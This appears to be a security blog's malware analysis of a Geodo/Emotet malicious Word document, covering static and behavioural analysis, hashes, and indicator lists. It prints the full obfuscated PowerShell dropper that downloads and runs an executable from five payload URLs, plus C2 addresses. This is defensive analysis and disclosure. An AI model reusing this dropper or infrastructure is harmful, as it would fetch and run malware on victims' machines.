MalDoc Analysis – Geodo
Geodo/Emotet is a banking Trojan that is distributed via Mal spam mails. It is part of the Feodo family
The sender of the emails appear to look like someone the recipient may know or internal to the recipient’s organisation, and usually include words like Invoice, Payment Notice, Purchase in the email subject
Following is an email received.
The link provided in the email leads to the download of the malicious word document. This document contains a macro (dropper), which post enabling will attempt connection to the payload URL’s to download the executable payload. After the executable has been invoked, it attempts to connect to a list of CnC IP’s for CnC communication
Tools:
Process Hacker
Fiddler
PEStudio
OLETools
Report.doc is the maldoc sample which we will be analyzing.
Size: 146 KB
MD5: 7158cd5e6e60d712bafe4b5c283a094a
SHA256: 30031fb352b8c753ca5aa8756a67435f19f94046fac589724d2a41fd162012b2
Static Analysis
Submitting the doc file to Virus Total, it is observed that various engines have marked it as malicious categorizing it as a Trojan Downloader
oleva is part of the python-oletools package and allows us to detect and extract VBA Macros and detect patterns.
Using olevba, we can see there are various streams like Macros. We observe that the macro code is obfuscated
Olevba also gives us a table informing us about various Suspicious properties like Obfuscation, Reverse, Base64 encoded strings, Auto-open and executable calls.
Behavioral Analysis
Step 1 – Finding a list of Payload URL’s
Disable the internet of the virtual machine. The reason we have disabled internet is so the maldoc tries connecting to each of its payload URLs. Maldoc’s s used for Geodo distribution have a list of 5 payload URLs. Failing to connect to one, it will attempt to connect to the next in the list.
Keep Fiddler running – Fiddler will intercept any HTTP Traffic.
After opening Report.doc, we enable macros.
It is then observed in Process Hacker, that winword.exe calls cmd.exe which then calls powershell.exe
We can then see the properties of the powershell.exe process.
Looking at the command line information, it is observed that that an obfuscated script is passed to powershell as its argument.
powershell "(('yT'+'G'+'nsadasd '+'= &('+'aUXnaU'+'X+'+'aU'+'XeaUX+aU'+'X'+'w-o'+'bj'+'ec'+'aUX+'+'a'+'U'+'XtaUX) ran'+'d'+'om;yT'+'GYYU = .(aU'+'Xn'+'eaUX+'+'a'+'U'+'XwaU'+'X'+'+'+'aUX-obje'+'ct'+'aUX) S'+'ys'+'tem.Net.W'+'ebC'+'li'+'ent'+';'+'y'+'TGNSB = yTG'+'ns'+'ada'+'sd.n'+'ext'+'(10000, '+'282'+'1'+'3'+'3);'+'yTG'+'AD'+'CX'+' ='+' '+'aUX '+' '+'ht'+'tp:'+'/'+'/burak.me.u'+'k/rsVS/'+'@ht'+'tp:'+'//'+'d'+'i'+'n'+'ge'+'s'+'gang'+'.'+'co'+'m/yZCL'+'T'+'O/@http'+'://brcom.'+'de/3x2c/'+'@http'+'://e'+'a'+'s'+'yda'+'t'+'a.gr/szTMN'+'v/@'+'h'+'ttp'+':/'+'/bakino'+'.com'+'/3'+'J'+'6mS'+'/'+'aUX.S'+'plit('+'a'+'UX'+'@a'+'UX);yTG'+'SD'+'C '+'='+' yTGen'+'v:pu'+'b'+'lic '+'+ '+'aUXT4KaU'+'X + '+'yT'+'GN'+'SB + (aUX.ex'+'aU'+'X+aUXea'+'UX'+')'+';for'+'e'+'ac'+'h('+'y'+'TGasfc '+'in'+' yTGAD'+'CX'+'){try{yTGYYU'+'.esyDotJT'+'W'+'nltJ'+'TOa'+'dFItJTlee'+'s'+'y'+'(yTG'+'asfc'+'.esy'+'ToStrtJ'+'TitJT'+'Ngesy()'+','+' y'+'TGSDC)'+';'+'&(aUXIn'+'voaU'+'X+'+'aUXkaUX'+'+a'+'UXe-It'+'emaUX)'+'('+'yTG'+'SDC)'+';b'+'rea'+'k;}ca'+'tch{'+'}}')-CrePLACe'yTG',[cHaR]36 -REPlaCe'aUX',[cHaR]39-REPlaCe'tJT',[cHaR]96 -REPlaCe 'T4K',[cHaR]92-CrePLACe 'esy',[cHaR]34) | .( $pshoMe[4]+$pshome[30]+'X')
Analyzing the obfuscated code, it is seen that there is a lot of concatenations with ‘+’
Removing ‘+’ , we then get some human readable code
powershell "(('yTGnsadasd = &(aUXnaUX+aUXeaUX+aUXw-objecaUX+aUXtaUX) random;yTGYYU = .(aUXneaUX+aUXwaUX+aUX-objectaUX) System.Net.WebClient;yTGNSB = yTGnsadasd.next(10000, 282133);yTGADCX = aUX http://burak.me.uk/rsVS/@http://dingesgang.com/yZCLTO/@http://brcom.de/3x2c/@http://easydata.gr/szTMNv/@http://bakino.com/3J6mS/aUX.Split(aUX@aUX);yTGSDC = yTGenv:public + aUXT4KaUX + yTGNSB + (aUX.exaUX+aUXeaUX);foreach(yTGasfc in yTGADCX){try{yTGYYU.esyDotJTWnltJTOadFItJTleesy(yTGasfc.esyToStrtJTitJTNgesy(), yTGSDC);&(aUXInvoaUX+aUXkaUX+aUXe-ItemaUX)(yTGSDC);break;}catch{}}')-CrePLACe'yTG',[cHaR]36 -REPlaCe'aUX',[cHaR]39-REPlaCe'tJT',[cHaR]96 -REPlaCe 'T4K',[cHaR]92-CrePLACe 'esy',[cHaR]34) | .( $pshoMe[4]+$pshome[30]+'X')
Thus the de-obfuscated power shell code has five URL’s :
hxxp://burak.me.uk/rsVS/
hxxp://dingesgang.com/yZCLTO/
hxxp://brcom.de/3x2c/
hxxp://easydata.gr/szTMNv/
hxxp://bakino.com/3J6mS/
This is further verified when we look at the output in fiddler.
Fiddler has intercepted requests to those same 5 URL’s in the same order they were present in the PS code
Step 2 – Finding a list of CnC URL’s
Visiting hxxp://bakino.com/3J6mS/ manually, gives us the download of an executable named 78406.exe. We could have rerun the maldoc and let it’s power-shell download the executable, but then it would initiate the connection to one CnC IP and we would not get it’s entire list. To get the entire list the payload is executed with the internet of the VM disconnected
Size: 232 KB
MD5:EE1F9803CB1EA4BD44B5E44665ED4D23
SHA256: 29F4F2BAD8B1D2701A301D852F5649E25F8FACBBC3C9C68B2936DDD6139F5899
Submitting the payload file to Virus Total, it is observed that various engines have marked it as malicious.
Opening the executable in PEStudio, many observations are made:
- It is detected as a fake Microsoft executable
- Has a high detection rate on Virus Total
- Many sections are blacklisted
- Year of compiler is returned to be 2028 (Back to the Future?)
On executing the payload (78406.exe), windows moved it to C:\Users\<UserName>\AppData\Local\Microsoft\Windows\ and renamed it to tipsharpen.exe
tipsharpen.exe will then execute from the AppData Folder.
On observing its process in process hacker, it is seen that it tries to mimic itself as an executable developed by Microsoft
Since there is no internet connectivity, tipsharpen will then attempt to connect to multiple CnC’s and loop over its CnC list
IOCs
Payload
hxxp://burak.me.uk/rsVS/
hxxp://dingesgang.com/yZCLTO/
hxxp://brcom.de/3x2c/
hxxp://easydata.gr/szTMNv/
hxxp://bakino.com/3J6mS/
Command and Control
hxxp://37.120.170.231:443/
hxxp://81.21.67.85:8080/
hxxp://136.243.197.230:8080/
hxxp://70.167.17.7/
hxxp://50.37.10.78/
hxxp://72.49.55.42/
hxxp://65.25.17.131/
hxxp://192.227.112.57/
hxxp://173.78.254.86:8080/
hxxp://119.18.8.51/
hxxp://199.167.209.11/
hxxp://69.41.8.88:8080/
hxxp://62.159.33.122:20/
hxxp://67.20.224.109/
hxxp://86.209.63.166/
hxxp://222.112.169.133/
hxxp://70.183.98.85:8080/
hxxp://105.228.39.7/
hxxp://69.129.91.38/
hxxp://179.52.46.11/
hxxp://178.42.196.228:8080/
hxxp://50.84.214.74/
hxxp://169.0.250.138/
hxxp://125.129.212.89:8080/
hxxp://217.160.93.187:443/
hxxp://174.140.167.85:443/
hxxp://216.105.170.139:4143/
hxxp://185.25.184.214:8080/
hxxp://205.178.137.221:8080/
hxxp://107.189.165.5:8080/
hxxp://64.182.125.5:8080/
hxxp://188.226.223.31:443/
hxxp://80.68.90.117:8080/
hxxp://72.52.216.110:8080/
hxxp://50.28.34.12:8080/
Experience of over a decade in the IT and Cyber-security domain. A cyber-detective by nature and has solved numerous cyber-attack-cases during his tenure at Network Intelligence. When not solving cyber-crimes, he enjoys video-games and photography.
